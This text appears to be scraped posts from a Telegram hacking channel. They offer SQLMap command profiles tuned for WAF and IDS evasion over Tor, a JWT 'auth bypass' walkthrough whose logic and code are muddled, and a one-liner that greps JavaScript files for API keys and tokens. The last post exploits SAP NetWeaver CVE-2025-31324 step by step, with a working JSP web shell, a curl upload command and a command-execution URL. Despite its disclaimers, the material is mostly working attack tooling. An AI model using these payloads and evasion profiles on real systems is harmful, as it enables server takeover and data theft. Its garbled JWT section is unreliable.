Hereβs a powerful list of π» SQLMap preconfigured profiles you can use for stealthy SQL injection, especially when dealing with WAFs, rate-limits, or intrusion detection systems (IDS/IPS).
These profiles combine SQLMap's most effective flags for stealth, evasion, and precision targeting.
β
1. Stealth Mode (WAF Bypass + Delay)
π Use Case: Slow, stealthy testing to avoid WAF/IPS.
ββββββββββββββββββ
β
2. Aggressive Mode with WAF Evasion
π Use Case: For deeper exploitation when stealth is less critical.
ββββββββββββββββββ
β
3. Blind Time-Based SQLi Detection
π Use Case: For blind injections using SLEEP, benchmark, or pg_sleep.
ββββββββββββββββββ
β
4. Obfuscated Payloads for Bypassing WAFs
π Use Case: When facing intelligent WAFs that detect classic patterns.
ββββββββββββββββββ
β
5. POST Parameter Injection with Custom Headers
π Use Case: Bypassing login forms and tricking WAFs using header spoofing.
ββββββββββββββββββ
β
6. Using TOR with WAF Evasion
π Use Case: Anonymous testing through TOR while bypassing WAF.
ββββββββββββββββββ
π§ Recommended Tamper Scripts
π‘ Bonus: Create a Custom Profile Alias
You can create a .sqlmap_profile file to reuse flags:
Then run:
That's all, friends!
Happy hacking and see you next time!π
#BugBounty
#ssrf
#sqli
#bypass
These profiles combine SQLMap's most effective flags for stealth, evasion, and precision targeting.
sqlmap -u "http://target.com/page.php?id=1" \
--random-agent \
--tamper=space2comment,between,charunicodeescape \
--delay=2 --timeout=10 \
--retries=5 \
--threads=1 \
--technique=BEUSTQ \
--level=3 --risk=2
ββββββββββββββββββ
sqlmap -u "http://target.com/page.php?id=1" \
--random-agent \
--tamper=space2comment,charencode,unmagicquotes,versionedmorekeywords \
--level=5 --risk=3 \
--batch --threads=5 \
--technique=BEUSTQ
ββββββββββββββββββ
sqlmap -u "http://target.com/page.php?id=1" \
--random-agent \
--tamper=space2comment,modsecurityversioned,between \
--technique=T \
--time-sec=5 \
--level=5 --risk=3 \
--batch
ββββββββββββββββββ
sqlmap -u "http://target.com/page.php?id=1" \
--tamper=charunicodeescape,randomcase,space2comment,versionedkeywords \
--random-agent \
--level=5 --risk=3 \
--threads=1 --delay=1 \
--batch
ββββββββββββββββββ
sqlmap -u "http://target.com/login.php" \
--data="username=admin&password=1234" \
--method=POST \
--headers="X-Forwarded-For: 127.0.0.1" \
--random-agent \
--tamper=space2comment,charunicodeescape \
--level=5 --risk=3 \
--batch
ββββββββββββββββββ
sqlmap -u "http://target.com/page.php?id=1" \
--tor --tor-type=SOCKS5 --check-tor \
--random-agent \
--delay=2 --timeout=10 \
--tamper=space2comment,charunicodeescape,modsecurityversioned \
--batch
ββββββββββββββββββ
| Tamper Script | Description
| ---------------------- | -------------------------------------------
| `space2comment` | Replaces spaces with comments (`/**/`)
| `charunicodeescape` | Unicode-escapes payload characters
| `randomcase` | Randomizes keyword casing
| `between` | Obfuscates `WHERE` conditions
| `versionedkeywords` | Adds versioned comments before SQL keywords
| `equaltolike` | Replaces `=` with `LIKE`
| `unmagicquotes` | Bypasses magic quotes
| `modsecurityversioned` | Targets ModSecurity WAF bypass
You can create a .sqlmap_profile file to reuse flags:
# ~/.sqlmap_profile
--random-agent
--tamper=space2comment,charunicodeescape
--level=5
--risk=3
--threads=1
--delay=1
--timeout=10
--retries=3
--technique=BEUSTQ
Then run:
sqlmap -u "http://target.com/page.php?id=1" @~/.sqlmap_profile
That's all, friends!
Happy hacking and see you next time!
#BugBounty
#ssrf
#sqli
#bypass
Please open Telegram to view this post
VIEW IN TELEGRAM
β€11π₯4π₯°1
wget --mirror --convert-links --adjust-extension --page-requisites --no-parent http://target.com
Analyze JavaScript files for hidden secrets, tokens, or API endpoints
Discover hidden or forgotten pages like /admin, /test, etc. π΅οΈ
Search HTML comments for sensitive dev notes
Browse and inspect the full site locally without triggering WAFs or rate limits
grep -Ri "<!--" target.com
# Developer comments
grep -Ri "api" target.com
# API endpoints
python3 LinkFinder.py -i index.html -o cli
That's all, friends!
Happy hacking and see you next time!
#BugBounty
#ssrf
#sqli
#bypass
#wget
Please open Telegram to view this post
VIEW IN TELEGRAM
Target
Target : Expect More. Pay Less.
Shop Target online and in-store for everything from groceries and essentials to clothing and electronics. Choose contactless pickup or delivery today.
π₯4β€2π₯°2
Please open Telegram to view this post
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM
π₯5β€2
Please open Telegram to view this post
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM
β€10π₯°2
β API Authentication Bypass
Let's assume we have a vulnerable API endpoint:
The API uses JSON Web Tokens (JWT) for authentication. We can use a tool like
Step 1: Intercept JWT Token
Using Burp Suite, intercept the login request and capture the JWT token:
Response:
Step 2: Analyze JWT Token
Using a tool like
Step 3: Bypass Authentication
We can use a tool like
This will generate a new JWT token with a longer expiration time. We can use this token to bypass authentication:
PoC Code
Note: This is just a basic example and should not be used in production. In a real-world scenario, you should use a more sophisticated approach to bypass authentication.
That's all, friends!
Happy hacking and see you next time!π
#BugBounty
#ssrf
#sqli
#bypass
#wget #api
Let's assume we have a vulnerable API endpoint:
https://example.com/api/v1/usersThe API uses JSON Web Tokens (JWT) for authentication. We can use a tool like
Burp Suite to intercept and manipulate the JWT token.Step 1: Intercept JWT Token
Using Burp Suite, intercept the login request and capture the JWT token:
GET /api/v1/login HTTP/1.1
Host: example.com
Content-Type: application/json
{"username": "user", "password": "pass"}
Response:
HTTP/1.1 200 OK
Content-Type: application/json
{"token": "eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiIxMjM0NTY3ODkwIiwibmFtZSI6IkpvaGFuIjoiMjMwfQ.SflKxwRJSMeKKF2QT4fwpMeJf36POk6yJV_adQssw5c"}
Step 2: Analyze JWT Token
Using a tool like
jwt.io, we can analyze the JWT token and find the algorithm used (HS256) and the payload:{
"sub": "1234567890",
"name": "John Doe",
"iat": 1643723900,
"exp": 1644329700
}Step 3: Bypass Authentication
We can use a tool like
jwt_tool to generate a new JWT token with the same payload but with a longer expiration time (e.g., 1 year):jwt_tool --alg HS256 --payload '{"sub": "1234567890", "name": "John Doe", "iat": 1643723900, "exp": 2147483647}' --secret-key 'your_secret_key_here'This will generate a new JWT token with a longer expiration time. We can use this token to bypass authentication:
GET /api/v1/users HTTP/1.1
Host: example.com
Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiIxMjM0NTY3ODkwIiwibmFtZSI6IkpvaGFuIjoiMjMwfQ.SflKxwRJSMeKKF2QT4fwpMeJf36POk6yJV_adQssw5c
PoC Code
import jwt
# Load secret key
with open('secret_key.txt', 'r') as f:
secret_key = f.read().strip()
# Generate new JWT token with longer expiration time
payload = {'sub': '1234567890', 'name': 'John Doe', 'iat': 1643723900, 'exp': 2147483647}
new_token = jwt.encode(payload, secret_key, algorithm='HS256')
# Use new token to bypass authentication
headers = {'Authorization': f'Bearer {new_token.decode()}'}
response = requests.get('https://example.com/api/v1/users', headers=headers)
print(response.text)
Note: This is just a basic example and should not be used in production. In a real-world scenario, you should use a more sophisticated approach to bypass authentication.
That's all, friends!
Happy hacking and see you next time!π
#BugBounty
#ssrf
#sqli
#bypass
#wget #api
β€15π₯5π₯°5π1
This command extracts all JavaScript files from a given target using getJS, then downloads and scans them for sensitive keywords such as apikey, token, or secret.
JavaScript files often contain hidden endpoints, API keys, tokens, or sensitive configuration data. This command helps bug bounty hunters automate the discovery of potential security misconfigurations or leaked secrets exposed in frontend code.
getJS --url https://target.com | xargs -I@ curl -s @ | grep -Ei 'apikey|token|secret'
Please open Telegram to view this post
VIEW IN TELEGRAM
Target
Target : Expect More. Pay Less.
Shop Target online and in-store for everything from groceries and essentials to clothing and electronics. Choose contactless pickup or delivery today.
β€31
Zero-Day Vulnerability CVE-2025-31324 in SAP NetWeaver Platform: A Critical Analysisπ π₯
The CVE-2025-31324 vulnerability in the SAP NetWeaver platform is a critical zero-day vulnerability that allows for unauthenticated Remote Code Execution (RCE). It is exploited by targeting a weakness in the Metadata Uploader feature of the Visual Composer component.
1. What is SAP NetWeaver?π€
The SAP NetWeaver platform is an integrated technology architecture produced by SAP SE. It serves as the foundation for building and operating enterprise business applications. It combines database management, application runtime, system integration, service development, and user interface functions into a single system. It provides tools for integrating applications and information across different environments and systems.
The NetWeaver platform is the heart of modern SAP systems and enables:
In short, it is a technical platform for running, developing, and integrating major business applications in enterprises, forming the backbone of the SAP ecosystem for companies worldwide.
2. How Attackers Find Vulnerable Systems
π£
Attackers locate affected SAP NetWeaver platforms using various network scanning and information gathering techniques and tools, the most important of which are:
http.title:"SAP NetWeaver Application Server"
3. Detailed Vulnerability Explanationπ§
Affected Component: SAP NetWeaver Application Server Java, Visual Composer module.
Exploitation Method: The problem lies in a Missing Authorization Check
What happens during exploitation: The system accepts the file upload without properly verifying the user's authorization or checking the file securely, leading to the possibility of executing malicious code and gaining full control of the server (RCE) remotely.
Severity Level: CVSS 10/10 (CRITICAL)
4. Impact and Attack Targetsπ―
Please open Telegram to view this post
VIEW IN TELEGRAM
β€8
Wide Spread: There are over 1200 SAP NetWeaver systems exposed to the internet worldwide that are at risk. βοΈ
Exploitation Examples:
π Uploading a malicious Web Shell to the folder
and then accessing it to execute commands via GET requests.
π Stealing sensitive customer or financial data.
π Disrupting business activities.
Lateral movement within the network and compromising other systems.
Attack Workflow:βοΈ
1.The attacker prepares a malicious file (e.g., a Web Shell, a JAR or ZIP file embedded with malicious code).
2.They send this file as part of an HTTP POST request to a path like:
3.The SAP NetWeaver server, due to the missing authorization check, accepts the file and stores/executes it as part of its system.
4.The attacker then follows up with an HTTP GET request to the Web Shell file (or executes Java code or other code), beginning their full control over the system.
5.The attacker can now execute any commands, steal data, or move laterally within the network.
5. Tools Used for Sending POST Requestsπ
Attackers use specialized tools that allow them to formulate and send HTTP requests manually or automatically. The most famous tools used are:
curl
π A command-line tool available on Linux (and all major systems) that allows sending custom HTTP/HTTPS requests.
π Example usage:
Burp SuiteπΌ
π An advanced penetration testing tool that allows the attacker or security tester to intercept, examine, and modify any HTTP request (GET/POST).
π They can modify requests directly through the UI or use tools like Repeater/Intruder to send multiple different requests and observe responses.
π Postman
π A comprehensive application for sending HTTP requests and API development. It allows sending files, modifying fields and headers, and analyzing responses.
π Often used for manual testing to see the response and repeat requests.
π Custom Scripts in Python/JavaScript
π An advanced attacker might write a custom script using libraries like requests (Python) or axios (JavaScript) to send automated POST requests according to their attack scenario.
Warning: These steps are shown for educational and awareness purposes only, and not for actual illegal application.
1. Prepare a Malicious File
The file could be a Web Shell in JSP, for example:
2. Send a POST Request to Upload the File
Using a tool like curl:
3. Access the File After Upload
Visit the path where the file is stored (example):
The command will be executed and the result returned on the page, confirming that the attacker has gained full control of the server.π―
Disclaimer: This information is provided for educational and awareness purposes only. Unauthorized testing or exploitation of systems you do not own is illegal.π«
That's all, friends!
Happy hacking and see you next time!π
#BugBounty #ssrf
#sqli #bypass
#api
Exploitation Examples:
j2ee/cluster/apps/sap.com/irj/servlet_jsp/irj/root/
and then accessing it to execute commands via GET requests.
Lateral movement within the network and compromising other systems.
Attack Workflow:
1.The attacker prepares a malicious file (e.g., a Web Shell, a JAR or ZIP file embedded with malicious code).
2.They send this file as part of an HTTP POST request to a path like:
/irj/servlet/prt/portal/prtroot/com.sap.visualcomposer.dev.server.metadatauploader
3.The SAP NetWeaver server, due to the missing authorization check, accepts the file and stores/executes it as part of its system.
4.The attacker then follows up with an HTTP GET request to the Web Shell file (or executes Java code or other code), beginning their full control over the system.
5.The attacker can now execute any commands, steal data, or move laterally within the network.
5. Tools Used for Sending POST Requests
Attackers use specialized tools that allow them to formulate and send HTTP requests manually or automatically. The most famous tools used are:
curl
curl -k -X POST -F "file=@webshell.jsp" https://target-sap-server/metadatauploader
Burp Suite
6. Technical Steps for Exploitation (For Study & Understanding Only)β οΈ
Warning: These steps are shown for educational and awareness purposes only, and not for actual illegal application.
1. Prepare a Malicious File
The file could be a Web Shell in JSP, for example:
<% if (request.getParameter("cmd") != null) {
String cmd = request.getParameter("cmd");
Process p = Runtime.getRuntime().exec(cmd);
java.io.InputStream in = p.getInputStream();
int a = -1;
while((a=in.read())!=-1){
out.print((char)a);
}
in.close();
} %>2. Send a POST Request to Upload the File
Using a tool like curl:
curl -k -X POST \
-F "file=@webshell.jsp" \
https://target-sap-server/irj/servlet/prt/portal/prtroot/com.sap.visualcomposer.dev.server.metadatauploader
3. Access the File After Upload
Visit the path where the file is stored (example):
https://target-sap-server/irj/go/km/docs/webshell.jsp?cmd=whoami
The command will be executed and the result returned on the page, confirming that the attacker has gained full control of the server.
Disclaimer: This information is provided for educational and awareness purposes only. Unauthorized testing or exploitation of systems you do not own is illegal.
That's all, friends!
Happy hacking and see you next time!
#BugBounty #ssrf
#sqli #bypass
#api
Please open Telegram to view this post
VIEW IN TELEGRAM
β€25